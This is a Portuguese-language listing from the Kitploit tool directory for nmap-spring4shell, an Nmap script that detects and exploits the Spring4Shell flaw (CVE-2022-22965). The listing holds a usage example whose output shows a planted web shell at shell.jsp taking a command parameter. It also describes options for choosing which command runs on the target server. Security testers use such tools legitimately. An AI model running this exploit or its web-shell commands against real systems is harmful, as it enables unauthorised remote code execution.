Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nmap-spring4shell — Script NSE do Nmap para detectar e explorar a vulnerabilidade de execução remota de código (RCE) Spring4Shell (CVE-2022-22965) em serviços HTTP, com injeção de payload configurável e execução de comandos. | Kitploit
Ferramentas/GitHubGitHub/gpiechnik2/nmap-spring4shell
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubgpiechnik2/nmap-spring4shell

nmap-spring4shell

Script NSE do Nmap para detectar e explorar a vulnerabilidade de execução remota de código (RCE) Spring4Shell (CVE-2022-22965) em serviços HTTP, com injeção de payload configurável e execução de comandos.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
841há 4 anosAinda não revisado
Compartilhar

Nmap-spring4shell

Log4shell-nmap é um script NSE para detectar vulnerabilidades de RCE Spring4Shell (CVE-2022-22965) em serviços HTTP. O script injeta o payload correto na aplicação e então executa o seguinte comando no endpoint especificado.

Vulnerabilidade

Veja aqui.

Uso

root@kitploit:~
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT     STATE SERVICE    REASON  VERSION
8080/tcp open  http-proxy syn-ack
| spring4shell: 
|   VULNERABLE:
|   Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
|     State: VULNERABLE
|     IDs:  CVE:CVE-2022-22965
|     Check results:
|       127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
|     Extra information:
|       TESTED URL: 127.0.0.1:8080
|       COMMAND: id
|       ASSERTION: uid
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965

Argumentos

Podemos usar várias variáveis no script. Estas são as seguintes:

  • endpoint - url relativa. Em https://bugspace.pl/search/videos será /search/videos,
  • command - comando a ser executado no servidor. O comando padrão é id,
  • assertion - a string verificada na resposta do servidor. A afirmação padrão é uid,
  • filename - nome do arquivo no servidor. Para mais informações veja aqui. O nome padrão é shell.

Dados adicionais

Testado na aplicação de aqui e aqui

Licença

Mesma do Nmap. Veja https://nmap.org/book/man-legal.html

Baixar ferramenta